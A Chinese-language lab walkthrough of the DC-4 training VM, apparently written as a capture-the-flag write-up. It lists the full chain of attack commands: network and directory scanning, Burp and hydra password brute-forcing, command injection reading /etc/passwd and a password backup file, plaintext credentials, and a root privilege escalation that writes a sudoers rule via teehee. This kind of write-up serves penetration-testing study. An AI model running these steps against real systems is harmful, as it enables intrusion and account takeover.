DC-4
信息收集
扫描主机
arp-scan -l
端口扫描
nmap -p- -A 192.168.16.165
发现ssh端口和80端口都打开着呢
目录扫描
dirsearch -u http://192.168.16.165
dirb hhtp://192.168.16.165
登录web网页
发现没有可用信息,发现页面提示admin
爆破
用户密码爆破
使用用户名admin,密码随意,点击登录,使用bp进行密码爆破
爆破出密码为happy
登录网页
点击command,点击run发现执行了ls -l命令
命令执行漏洞利用
使用bp抓包,点击run,右键发送重发器,发现数据包是post提交数据
将radio更改为id查看用户权限,发现是普通用户。
id
查看有没有其他用户
cat /etc/passwd
发现有三个普通用户:charles、jim、sam和root用户
扫描三个用户的家目录,发现只有jim的加目录中有数据
ls -lh /home/charles
ls -lh /home/jim
ls -lh /home/sam
访问jim目录下backups,发现有一个旧密码本
ls -lh /home/jim/backups
查看旧密码本
cat /home/jim/backups/old-passwords.bak
将密码复制到pswd.txt文档中
扫描端口时发现有ssh端口开放,尝试使用hydra爆破端口
hydra -l jim -P pswd.txt ssh://192.168.16.165
使用ssh登录jim账号,发现有邮件
ssh jim@192.168.16.165
密码:jibril04
查看当前文件夹,查看文件mbox
ls -l
cat mbox
查看邮件,Linux中邮件存放在/var/spool/mail中
cd /var/spool/mail
ls
cat jim
邮件内容提到Charles的密码为^xHhA&hvim0y可以切换Charles查看
su Charles
使用命令发现权限不够
提权
查看所有可以使用root用户身份使用的命令
sudo -l
发现teehee可以使用root身份使用
echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
这个命令的作用是将一行文本添加到 /etc/sudoers 文件中,允许用户 charles 在执行 sudo 命令时无需输入密码。下面是对该命令的详细解析:
-
echo ‘charles ALL=(ALL:ALL) NOPASSWD:ALL’: echo 命令用于向标准输出打印文本。此处的文本是 ‘charles ALL=(ALL:ALL) NOPASSWD:ALL’,它定义了一个 sudo 权限规则。
- charles: 这是用户名,在这个例子中是指定的用
- ALL=(ALL:ALL): 这部分规定了 charles 用户可以以任何用户身份和组执行任何命令。
- NOPASSWD:ALL: 这部分规定了 charles 用户在执行 sudo 命令时无需输入密码。
-
|: 这是管道符号,用于将 echo 命令的输出传递给下一个命令。
-
sudo teehee -a /etc/sudoers:sudo 是一个授权用户执行特权命令的工具。teehee 命令用于从标准输入读取数据,并将其写入文件。-a 参数表示追加写入。
- /etc/sudoers: 这是一个特殊的文件,用于配置 sudo 的权限规则。只有具有适当权限的用户才能修改此文件。
用是,利用 echo 打印出 sudo 权限规则的文本,并将其追加写入 /etc/sudoers 文件中。这样就允许了用户 charles 在执行 sudo 命令时无需输入密码。